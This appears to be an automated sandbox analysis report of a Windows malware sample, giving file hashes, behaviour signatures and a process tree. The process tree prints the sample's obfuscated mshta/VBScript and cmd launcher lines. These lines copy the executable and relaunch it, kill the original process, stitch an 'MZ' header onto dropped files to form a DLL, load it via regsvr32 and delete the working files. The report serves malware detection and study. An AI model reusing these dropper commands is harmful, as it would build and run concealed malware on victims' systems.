Overview

overview

7

Static

static

3

0b50380f36...88.exe

windows7-x64

7

0b50380f36...88.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    117s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2023 02:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0b50380f368118d947ec6026773d5788.exe

  • Size

    1.1MB

  • MD5

    0b50380f368118d947ec6026773d5788

  • SHA1

    b677117455147d2a33eea408eb4121eecca39f6b

  • SHA256

    49b676ea9482bdd87be33ffec1b0251c66cb2751822f69952134dfa1c469a5ea

  • SHA512

    84d22072da1b3a4a7ff1a4c2fb70510bcb693d7502b876f9736f83f130b334ed6c07e8b5b62557120030be07af82ca85b661e8cb04ab1b9d4f36213bec64330a

  • SSDEEP

    24576:sODjvO/OGe6M7AVEP9ZbfpnG+U+PXEHFQLq:BPL62vz1U+flLq

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0b50380f368118d947ec6026773d5788.exe
    "C:\Users\Admin\AppData\Local\Temp\0b50380f368118d947ec6026773d5788.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vBscRIPT: CLose ( CReATeOBjEct ("WsCRIpT.shelL" ).RUN ( "C:\Windows\system32\cmd.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\0b50380f368118d947ec6026773d5788.exe"" > ..\XVjX.exe && sTART ..\XvJX.eXE /P65CNkq1ut3dDs4FAveJ & IF """" == """" for %I in ( ""C:\Users\Admin\AppData\Local\Temp\0b50380f368118d947ec6026773d5788.exe"" ) do taskkill /F /iM ""%~NXI""" , 0 , TRUE ) )
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\0b50380f368118d947ec6026773d5788.exe" > ..\XVjX.exe && sTART ..\XvJX.eXE /P65CNkq1ut3dDs4FAveJ & IF "" == "" for %I in ( "C:\Users\Admin\AppData\Local\Temp\0b50380f368118d947ec6026773d5788.exe" ) do taskkill /F /iM "%~NXI"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3012
        • C:\Users\Admin\AppData\Local\Temp\XVjX.exe
          ..\XvJX.eXE /P65CNkq1ut3dDs4FAveJ
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2368
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" vBscRIPT: CLose ( CReATeOBjEct ("WsCRIpT.shelL" ).RUN ( "C:\Windows\system32\cmd.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\XVjX.exe"" > ..\XVjX.exe && sTART ..\XvJX.eXE /P65CNkq1ut3dDs4FAveJ & IF ""/P65CNkq1ut3dDs4FAveJ "" == """" for %I in ( ""C:\Users\Admin\AppData\Local\Temp\XVjX.exe"" ) do taskkill /F /iM ""%~NXI""" , 0 , TRUE ) )
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\XVjX.exe" > ..\XVjX.exe && sTART ..\XvJX.eXE /P65CNkq1ut3dDs4FAveJ & IF "/P65CNkq1ut3dDs4FAveJ " == "" for %I in ( "C:\Users\Admin\AppData\Local\Temp\XVjX.exe" ) do taskkill /F /iM "%~NXI"
              6⤵
                PID:2264
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\System32\mshta.exe" VBsCripT: cLOsE ( createobject ( "WScRIPT.ShELL"). RUN ( "CMd /Q /C ecHO 5%TiME%GzID> QJQFPt2.G & echo | SeT /P = ""MZ"" > ~GTZQ.E9F & cOpy /B /y ~GtZq.E9F + 9VFQlGjV.RpM+ GYVID.F + QJQFPt2.g ..\9F35R.1 & StaRT regsvr32 /u ..\9F35R.1 /s & Del /Q * " , 0 , TrUe ) )
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:2096
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /Q /C ecHO 5%TiME%GzID> QJQFPt2.G &echo | SeT /P = "MZ" > ~GTZQ.E9F & cOpy /B /y ~GtZq.E9F + 9VFQlGjV.RpM+ GYVID.F + QJQFPt2.g ..\9F35R.1 & StaRT regsvr32 /u ..\9F35R.1 /s & Del /Q *
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1156
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo "
                  7⤵
                    PID:2908
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>~GTZQ.E9F"
                    7⤵
                      PID:524
                    • C:\Windows\SysWOW64\regsvr32.exe
                      regsvr32 /u ..\9F35R.1 /s
                      7⤵
                      • Loads dropped DLL
                      PID:2672
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /iM "0b50380f368118d947ec6026773d5788.exe"
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2724

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\9F35R.1
          Filesize

          1.2MB

          MD5

          a33d8d3ff5c3b2f2e762032c97f5fb3c

          SHA1

          88d35ec60a519bcf833214f55a8018f017fccdaa

          SHA256

          c300bbbf521b18dd7c175507af9103466381bbddc02e02a97070b444e2050754

          SHA512

          0993d0339968d76d1bf2b7d64604570772cd2d94b6874784e7d711a37855c82f5fd7d45bfbaa7b6cf9c5e4bba7e279c49467eee91eb5af57dadb4a7b4b722917

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\9VFQlGjV.rpM
          Filesize

          38KB

          MD5

          0db61ff63df3e12ef10f33de51eebc84

          SHA1

          e01f36f6c7d2850b3187032c0f5e59eaf811915f

          SHA256

          c5bf8b6e30b6390aff518ad395ebee187a7ee4d29f7e2b5864ec6cef873f8a5b

          SHA512

          6d77047e56793295c6234db9c3a02af14c9ce027a1de68c60bd3fbb362902417d0395b4e1adb17493812f1269d4e9a307bdc0a8d26c0f3478278649da4789ca2

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\GyVID.F
          Filesize

          19KB

          MD5

          52bd06591a033b1ae4f5314f80d220bc

          SHA1

          0fa0e9c4409be74f7a2bb12d1348c9c84adcf1c1

          SHA256

          45b58a2a62baeaa3414ef77023e26f697d571aefe481b4b86c7aa71db969948e

          SHA512

          7cd7cfd010ba4e5bf1a39ce922c739a52472cad0cd51c1dad56cbc12f4cf6feb7afb63fd992d2359deb0f713d0e1986312f85e50bda694118727dd8930f6d6c6

          Download Submit

        • \Users\Admin\AppData\Local\Temp\9F35R.1
          Filesize

          561KB

          MD5

          9befd094c26dbcfd1bfab8486b541511

          SHA1

          a03ac126a2a225b83d5fd711cd534200b9af129e

          SHA256

          55bc622834533cefcba0a3e4dc3212423b0d949427c1e8750fd0a6fb3f8678df

          SHA512

          843a7aab91dbcbdf5cf9c33f49e8087304b39f1adfb2f2fad7c3b857cbf82ccaa1852596dbbe66adb2a240a88a454e7b3e5749a4eb6d5ece021fe1c32dadfd46

          Download Submit

        • \Users\Admin\AppData\Local\Temp\XVjX.exe
          Filesize

          1.1MB

          MD5

          0b50380f368118d947ec6026773d5788

          SHA1

          b677117455147d2a33eea408eb4121eecca39f6b

          SHA256

          49b676ea9482bdd87be33ffec1b0251c66cb2751822f69952134dfa1c469a5ea

          SHA512

          84d22072da1b3a4a7ff1a4c2fb70510bcb693d7502b876f9736f83f130b334ed6c07e8b5b62557120030be07af82ca85b661e8cb04ab1b9d4f36213bec64330a

          Download Submit

        • memory/2672-22-0x0000000002180000-0x0000000002236000-memory.dmp

          Filesize

          728KB

          Download

        • memory/2672-21-0x0000000002F60000-0x0000000003032000-memory.dmp

          Filesize

          840KB

          Download

        • memory/2672-20-0x0000000001F40000-0x0000000002080000-memory.dmp

          Filesize

          1.2MB

          Download

        • memory/2672-23-0x0000000001F40000-0x0000000002080000-memory.dmp

          Filesize

          1.2MB

          Download

        • memory/2672-24-0x0000000003040000-0x00000000030F0000-memory.dmp

          Filesize

          704KB

          Download

        • memory/2672-25-0x00000000002A0000-0x000000000033C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/2672-26-0x00000000002A0000-0x000000000033C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/2672-28-0x00000000002A0000-0x000000000033C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/2672-29-0x00000000002A0000-0x000000000033C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/2672-31-0x0000000002180000-0x0000000002236000-memory.dmp

          Filesize

          728KB

          Download